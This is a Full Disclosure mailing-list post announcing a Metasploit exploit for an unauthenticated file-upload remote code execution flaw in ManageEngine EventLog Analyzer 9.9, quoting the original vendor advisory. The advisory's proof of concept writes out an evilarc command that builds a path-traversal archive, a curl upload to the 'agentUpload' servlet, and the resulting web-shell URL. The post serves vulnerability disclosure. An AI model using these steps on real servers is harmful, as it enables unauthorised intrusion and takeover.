Hi all, h0ng10 from Mogway Security has found a file upload leading to RCE in Eventlog Analyzer (see advisory below for a snippet or go to http://seclists.org/fulldisclosure/2014/Aug/86).
h0ng10 communicated this over a year ago to ManageEngine but they failed to fix it. When I found and communicated the same vulnerability to ManageEngine a week ago, they accepted my report as valid and said they would look into it. There was no mention of h0ng10's previous discovery, so I don't know what they did with it - perhaps they "lost" or "misplaced" it? Anyway, I had an exploit ready for when they fixed it, but since it's the vulnerability information is out, I'm releasing the exploit today. The exploit credit's h0ng10 as the original vulnerability discoverer and can be found at: https://github.com/rapid7/metasploit-framework/pull/3732 This will hopefully be integrated in Metasploit soon. The exploit has been thoroughly tested in many Windows and Linux versions. Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series! Regards, Pedro On 31 August 2014 16:39, Advisories <[email protected]> wrote: > Mogwai Security Advisory MSA-2014-01 > ---------------------------------------------------------------------- > Title: ManageEngine EventLog Analyzer Multiple Vulnerabilities > Product: ManageEngine EventLog Analyzer > Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux > Impact: critical > Remote: yes > Product link: http://www.manageengine.com/products/eventlog/ > Reported: 18/04/2013 > by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) > > > > > Vulnerability description: > ---------------------------------------------------------------------- > 1) Unauthenticated remote code execution > ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents > to send log data as zip files to the central server. Files can be uploaded > without > authentication and are stored/decompressed in the "data" subdirectory. > > As the decompress procedure is handling the file names in the ZIP file in a > insecure way it is possible to store files in the web root of server. This can > be used to upload/execute code with the rights of the application server. > > > Proof of concept: > ---------------------------------------------------------------------- > 1) Unauthenticated remote code execution > > > - Create a malicious zip archive with the help of evilarc[1] > evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp > - Send the malicious archive to the agentUpload servlet > curl -F "[email protected]" http://172.16.37.131:8400/agentUpload > - Enjoy your shell > http://172.16.37.131:8400/cmdshell.jsp > > A working Metasploit module will be released next week. > > ---------------------------------------------------------------------- > Mogwai, IT-Sicherheitsberatung Muench > Steinhoevelstrasse 2/2 > 89075 Ulm (Germany) > > [email protected] > _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
